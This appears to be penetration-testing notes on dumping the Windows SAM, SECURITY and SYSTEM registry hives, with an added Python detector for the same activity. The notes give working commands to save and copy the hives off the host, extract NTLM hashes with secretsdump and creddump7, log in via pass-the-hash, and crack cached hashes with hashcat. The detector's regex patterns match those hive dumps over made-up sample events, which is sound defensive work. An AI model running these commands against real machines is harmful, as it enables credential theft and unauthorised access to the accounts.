
Living off the Land

23.1.1 - SAM, SYSTEM and Security files

Requires membership of BUILTIN\Administrators (check with whoami /all)

whoami /all 
reg save hklm\security c:\security
reg save hklm\sam c:\sam
reg save hklm\system c:\system
copy C:\sam z:\loot
copy c:\security z:\loot
copy c:\system z:\loot

Could always utilise SMBServer.py here too

*Evil-WinRM* PS C:\windows.old\Windows\system32> download SAM
*Evil-WinRM* PS C:\windows.old\Windows\system32> download SYSTEM
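
From the defender's side, the reg save / hive copy commands above are easy to spot in process-creation telemetry. The following is an added example (not from the original notes) that runs simple command-line matching over a few constructed process-creation records; the record shape loosely follows Sysmon Event ID 1 fields and the users and paths are made up.

```python
import re

# Constructed sample process-creation events for this example; the field
# names loosely follow Sysmon Event ID 1, the values are made up.
SAMPLE_EVENTS = [
    {"Image": r"C:\Windows\System32\reg.exe",
     "CommandLine": r"reg save hklm\sam c:\sam", "User": "LAB\\svc-deploy"},
    {"Image": r"C:\Windows\System32\reg.exe",
     "CommandLine": r"reg  SAVE  HKLM\SYSTEM C:\Windows\Temp\sys.hiv", "User": "LAB\\alice"},
    {"Image": r"C:\Windows\System32\reg.exe",
     "CommandLine": r"reg query hklm\software\microsoft\windows\currentversion\run",
     "User": "LAB\\alice"},
    {"Image": r"C:\Windows\System32\cmd.exe",
     "CommandLine": r"cmd /c copy C:\windows.old\Windows\system32\config\SAM z:\loot",
     "User": "LAB\\bob"},
]

# reg.exe save/export of the three hives the notes above dump. Case and
# spacing vary between shells, so normalise the command line first.
HIVE_SAVE = re.compile(
    r"\breg(?:\.exe)?\s+(?:save|export)\s+[\"']?hklm\\(?:sam|security|system)\b",
    re.IGNORECASE)
# On-disk copies of the hive files (live config directory or a windows.old leftover).
HIVE_FILE = re.compile(r"\\config\\(?:sam|security|system)\b", re.IGNORECASE)


def classify(event):
    """Return a short reason if the event looks like hive dumping, else None."""
    cmd = " ".join(event.get("CommandLine", "").split())  # collapse whitespace runs
    if HIVE_SAVE.search(cmd):
        return "reg save/export of SAM/SECURITY/SYSTEM hive"
    if HIVE_FILE.search(cmd):
        return "access to on-disk SAM/SECURITY/SYSTEM hive file"
    return None


def find_hive_dumps(events):
    """Return (user, command line, reason) for every event classify() flags."""
    hits = []
    for event in events:
        reason = classify(event)
        if reason:
            hits.append((event["User"], event["CommandLine"], reason))
    return hits


if __name__ == "__main__":
    for user, cmd, reason in find_hive_dumps(SAMPLE_EVENTS):
        print(f"{user}: {reason} -> {cmd}")
```

In practice the same match is run against 4688 or Sysmon events in the SIEM; the benign reg query in the sample shows why the pattern is anchored on save/export and the hive names rather than on reg.exe alone.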

These files give the NTLM hashes of all local users, which can then be used to log in via PtH with Evil-WinRM or xfreerdp3. All listed tools come from creddump7; it is worth trying each one if another fails.

impacket-secretsdump -sam sam -security security -system system LOCAL
samdump2 SYSTEM SAM
python2 samdump.py SYSTEM SAM
python2 lsasecrets.py SYSTEM SECURITY
python2 cachedump.py SYSTEM SECURITY
secretsdump.py -system SYSTEM -ntds ntds.dit LOCAL

As an alternative to logging in with the hash, try cracking it. Some machines do not allow hash-based logon, which mitigates PtH.

hashcat -m 2100 hashes.txt /usr/share/wordlists/rockyou.txt   # -m 2100 is DCC2 (MS Cache 2), the format cachedump.py produces